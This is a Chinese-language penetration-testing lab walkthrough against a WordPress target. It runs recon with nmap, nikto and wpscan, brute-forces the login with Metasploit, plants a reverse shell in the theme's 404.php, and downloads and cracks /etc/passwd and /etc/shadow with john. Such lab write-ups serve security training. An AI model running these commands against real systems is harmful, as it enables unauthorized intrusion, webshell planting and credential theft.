暴力破解漏洞介绍
穷举法的基本思想是根据题目的部分条件确定答案的大致范围,并在此范围内对所有可能的情况逐一验证,直到全部情况验证完毕。若某个情况验证符合题目的全部条件,则为本问题的一个解;若全部情况验证后都不符合题目的全部条件,则本题无解。穷举法也称为枚举法。
Web安全中的暴力破解也是利用尝试所有的可能性最终获取正确的结果。
信息探测
扫描主机服务信息以及服务版本
– nmap -sV 靶场IP地址
快速扫描主机全部信息
– nmap -T4 –A -v 靶场IP地址
探测敏感信息
– nikto -host http://靶场IP地址:端口
深入挖掘
分析nmap 、nikto扫描结果,并对结果进行分析,挖掘可以利用的信息;使用浏览器打开 http://ip:port/敏感页面,查看敏感信息,找到可利用的位置。
想办法要暴力破解,使用wpscan匹配user
wpscan --url www… --enumerate u
暴力破解
启动Metasploit -> msfconsole
msf > use auxiliary/scanner/http/wordpress_login_enum
msf auxiliary(wordpress_login_enum) > set username admin
msf auxiliary(wordpress_login_enum) > set pass_file /usr/share/wordlists/dirb/common.txt
msf auxiliary(wordpress_login_enum) > set targeturi /secret/
msf auxiliary(wordpress_login_enum) > set rhosts 192.168.1.13
msf auxiliary(wordpress_login_enum) > run
知道了密码也是admin
登录
执行shell,获取反弹shell。
http://192.168.253.20/secret/wp-content/themes/twentyseventeen/404.php
查看系统信息 sysinfo
查看用户权限 id
制作shell
上传
设置相应配置
浏览器启动shell.php
成功
root权限
– Metasploit中 利用返回shell 下载 download /etc/passwd download /etc/shadow
– 将文件转换为join可以识别的文件格式
unshadow passwd shadow > cracked
– 使用john破解密码
john cracked
知道了密码。
总结
提权时可以抓取 /etc/passwd 和 /etc/shadow ,之后使用join来破解对应的密码,然后使用对应的用户名密码提升root权限;
对于wp的渗透中,启动对应的主题,然后在404页面上传shell;